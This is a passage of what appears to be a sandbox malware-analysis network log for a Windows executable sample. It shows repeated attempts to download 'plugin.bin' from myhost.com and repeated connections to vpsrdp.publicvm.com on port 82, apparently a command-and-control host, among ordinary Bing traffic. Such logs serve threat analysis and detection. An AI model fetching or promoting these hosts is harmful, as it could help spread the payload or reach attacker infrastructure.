      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:08 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNBCoo5J%2F%2F5a4Iwbi1pEMM7h3HrbO77zQdlkrLcgTInbenfrkvv9FrsLS5U53rU2duTMW4kLQzTka%2BN%2FpA78kGs%2FGp%2B4x%2BFZ1Dm9T9aLBErNSDXfk9Bh3pzlhD7Z"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e5f387463ca-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:10 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THLUKPxlMaiScKCPBCvGtXjVb7Jq0h%2FTrNmf2b3FBBKwe24skiN0r7a8kNtcGPRDUwDdvXdbakLMG0NylhUOxgqKgulHNpX4GdB0fe7XOml5PHce6LFOj51HPwgv"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e656fe59442-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:10 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eqT0xTxTDasorkTi18S5g01IsX9OntG%2FRq8K30tNLY6vU9Ww4i%2FIfJaqi08ByvoAnaFOAQvRJgyh9Njis0NKI3%2FKk%2BnUmHlg1soxaHlDGu7MFWSpzVRNao0dY%2Fdg"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e6c6dd794a5-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pJvpeQets%2BWMBwANb9trYWXPev%2Fh7XnLUO9UptGyESdOWfh7n3EFeFj4%2F2yELTtB2lRphlqOTHfgIrWClFBGwyOXBiznm9BQ7vEs%2FXWBw4exK%2BT3J25PHVGeVyq"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e721b33dc6b-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:59:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HVaZVB8bLRBL4aPpJ4okNLD%2FpR8zE3FUDW0qctu%2FcOxp5Zred31Mpb28HPgxLrA4e1yxhwZLR90Ut65sbSh5X1lJRDQf3VqC4L%2BfZMs1aW3DRz%2F5vvjhKbezYJ5W"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735e776f2c776a-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
    • 204.79.197.237:443
      https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8zEYtp3n2ejf6nXzvuu0pPTVUCUx9YVemVS4C4odpuQqt_KEvSsZf0QB8Noc_TPglXF9UV5fAM9BKX7x3Bm30ZsrOIKG3G6rwG4rzV4njhGICbwot-nCwVZUVLq0lUMy-etQ-CQaLjGBNpy3Kui-OYcLdJiLFHYIuvaBZroBC2AmL3R19%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3D3a30a7be17ed16d6b6ddc195a7e06bd5&TIME=20240426T134616Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
      tls, http2
      2.6kB
       9.0kB
       19
      16

      HTTP Request

      GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8zEYtp3n2ejf6nXzvuu0pPTVUCUx9YVemVS4C4odpuQqt_KEvSsZf0QB8Noc_TPglXF9UV5fAM9BKX7x3Bm30ZsrOIKG3G6rwG4rzV4njhGICbwot-nCwVZUVLq0lUMy-etQ-CQaLjGBNpy3Kui-OYcLdJiLFHYIuvaBZroBC2AmL3R19%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3D3a30a7be17ed16d6b6ddc195a7e06bd5&TIME=20240426T134616Z&CID=531035994&EID=531035994&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8zEYtp3n2ejf6nXzvuu0pPTVUCUx9YVemVS4C4odpuQqt_KEvSsZf0QB8Noc_TPglXF9UV5fAM9BKX7x3Bm30ZsrOIKG3G6rwG4rzV4njhGICbwot-nCwVZUVLq0lUMy-etQ-CQaLjGBNpy3Kui-OYcLdJiLFHYIuvaBZroBC2AmL3R19%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3D3a30a7be17ed16d6b6ddc195a7e06bd5&TIME=20240426T134616Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

      HTTP Response

      204
    • 23.62.61.129:443
      https://www.bing.com/aes/c.gif?RG=427c8da424ad4e679959a38f7a336e93&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134616Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
      tls, http2
      1.5kB
       5.4kB
       17
      12

      HTTP Request

      GET https://www.bing.com/aes/c.gif?RG=427c8da424ad4e679959a38f7a336e93&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134616Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644

      HTTP Response

      200
    • 23.62.61.129:443
      https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
      tls, http2
      1.6kB
       6.4kB
       17
      13

      HTTP Request

      GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

      HTTP Response

      200
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      104 B
       2
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      260 B
       5
    • 172.67.177.125:80
      http://myhost.com/plugin.bin
      http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      463 B
       972 B
       4
      3

      HTTP Request

      GET http://myhost.com/plugin.bin

      HTTP Response

      301
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       29.4kB
       35
      31

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      25

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       35
      31

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.1kB
       33
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      104 B
       2
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      260 B
       5
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.9kB
       29
      25

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.1kB
       33
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       29
      25

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       24.0kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.4kB
       24.2kB
       37
      33

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.9kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      104 B
       2
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      260 B
       5
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.4kB
       23.8kB
       29
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.4kB
       24.2kB
       37
      33

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      25

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.1kB
       33
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.5kB
       24.2kB
       38
      34

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       29
      25

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.1kB
       33
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      104 B
       2
    • 139.99.66.103:82
      vpsrdp.publicvm.com
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      260 B
       5
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       31
      27

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.4kB
       24.2kB
       37
      33

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       34
      30

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.0kB
       23.8kB
       28
      24

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.1kB
       33
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.3kB
       24.1kB
       35
      29

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.2kB
       24.0kB
       32
      28

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 172.67.177.125:443
      https://myhost.com/plugin.bin
      tls, http
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      2.1kB
       23.9kB
       30
      26

      HTTP Request

      GET https://myhost.com/plugin.bin

      HTTP Response

      404
    • 204.79.197.200:443
      https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      tls, http2
      83.3kB
       2.4MB
       1707
      1704

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

